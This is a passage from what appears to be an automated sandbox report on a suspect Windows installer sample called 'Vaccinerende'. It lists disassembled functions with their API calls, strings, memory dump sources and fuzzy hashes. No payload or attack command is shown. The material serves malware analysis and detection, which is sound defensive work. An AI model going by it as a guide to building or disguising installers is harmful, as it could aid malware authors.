                                                                              • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,7570D4C4,00435000,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-949986762
                                                                              • Opcode ID: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                                              Function 0040437E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: N
                                                                              • API String ID: 3103080414-1130791706
                                                                              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                              Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              • API String ID: 2171350718-461813615
                                                                              • Opcode ID: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                                                              • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                              • Opcode Fuzzy Hash: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                                                              • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                              Function 00402EC1 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(00437800,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              • Null, xrefs: 00402FB8
                                                                              • Inst, xrefs: 00402FA6
                                                                              • soft, xrefs: 00402FAF
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                              • Error launching installer, xrefs: 00402F11
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 4283519449-527102705
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                                              Function 0040626E Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063C2
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,?,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(?), ref: 00406417
                                                                              • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 00406495
                                                                              Strings
                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 717251189-730719616
                                                                              • Opcode ID: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                                              Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                              • GetSysColor.USER32(00000000,?), ref: 00404281
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                              • SetBkMode.GDI32(?,?), ref: 00404299
                                                                              • GetSysColor.USER32(?), ref: 004042AC
                                                                              • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                              • DeleteObject.GDI32(?), ref: 004042D6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                              Function 004047DE Relevance: 10.7, APIs: 7, Instructions: 183stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32 ref: 004047E5
                                                                                • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,00437800,0040332A,00437800,00437800,00437800,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                                • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                                • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              • lstrcmpiW.KERNEL32(004281A0,?,00000000,?), ref: 00404817
                                                                              • lstrcatW.KERNEL32(?,004281A0,?,00000000,?), ref: 00404823
                                                                              • SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                              • String ID:
                                                                              • API String ID: 611778071-0
                                                                              • Opcode ID: f2e89f331acf436d66dc7b8e110d833f00676b1d4688132a04e050de87f1bf3a
                                                                              • Instruction ID: 0d4a6a07d32540202bd103048eaebc2e62f3dbef9356839362eadbdc3d2543bd
                                                                              • Opcode Fuzzy Hash: f2e89f331acf436d66dc7b8e110d833f00676b1d4688132a04e050de87f1bf3a
                                                                              • Instruction Fuzzy Hash: 6A5191F1A00209ABDB11AFA5CD45AAF76B8EF84315F10847BF601B62D1D73C9A418B6D
                                                                              Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                              Function 004052B0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(004226C8,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2531174081-0
                                                                              • Opcode ID: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                                              Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                              • GetMessagePos.USER32 ref: 00404B9D
                                                                              • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
